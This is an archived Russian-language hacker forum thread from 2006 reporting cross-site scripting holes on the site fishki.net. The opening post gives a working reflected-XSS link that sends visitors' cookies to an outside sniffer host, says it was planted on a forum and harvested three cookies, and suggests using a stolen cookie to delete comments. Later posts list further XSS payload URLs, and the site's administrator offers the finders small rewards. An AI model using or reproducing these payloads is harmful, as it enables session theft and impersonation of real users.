Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   xss на www.fishki.net (https://forum.antichat.xyz/showthread.php?t=16507)

podkashey 25.03.2006 17:17
xss на www.fishki.net
 
Пассивная XSS в поиске на популярном сайте _www.fishki.net:
если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Imag e%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru %2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript %3E
То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.

podkashey 26.03.2006 03:24
Обнаружил, что можно удалять комментарии, если вставить в куки че-нить дельное. Например ed36464a5c3b8f90fcd5d950a66197f4. Можно например написать скрипт, который будет лазить по топискам и тереть все комментарии, кроме нужных (реклама например)...
Если кто-нить будет реализовывать, накиньте денег на пивко... ;)

Rebz 26.03.2006 12:33
podkashey, молодец)
Дельно нашёл..) на пивко не смогу накинуть, а вот репку)..

Go0o$E 29.03.2006 14:07
Вот еще: http://www.fishki.net/gresult.php?pollid='><script>alert('XSS')%3B</script>&voteid=1 ; http://www.fishki.net/comment.php?id='><script>alert('XSS')%3B</script> ; http://www.fishki.net/rgolos.php?pollid='><script>alert('XSS')%3B</script> ; http://www.fishki.net/gresult.php?pollid='><script>alert('XSS');</script> и еще установка своих cookies - http://www.fishki.net/votecomsend.ph...der%3Dinjected

HitMan 29.03.2006 17:02
хотел бы выразить благодарность за создание этой темы и отдельно ресурсу античат.

podkashey, как мы с тобой уже договорились - на пиво я тебе дам за проделанную работу, кинь мне в пм wmz, на этой неделе постараюсь перевести.

Go0o$E, тебе тоже большое спасибо за найденные уязвимости, кинь также в пм свой wmz, постараюсь не обидеть.

как получите wmz, отпишитесь в этой теме, пожалуйста, чтоб не думали, что я обманул.

Спасибо.

censored! 29.03.2006 18:25
2HitMan
Ты админыч фишки?

HitMan 29.03.2006 18:28
censored!, да.
не с самого начала, двиг начат не мной, там внизу подписано чей

From m0nzt3r: сорри не удержался, просто твой проект нравится мне.Так держать!

+toxa+ 09.05.2006 21:11
http://xshop.fishki.net/my/orders/get_by_code.php?code=<script>alert(/xss_by_toxa/);alert(document.cookie)</script>&check=

HitMan 09.05.2006 21:21
+toxa+, это http://www.sexvideogid.ru/ - их партнёрка.
я там не при чём :(
если хочешь - могу им передать.
скажешь нет - промолчу


Время: 05:45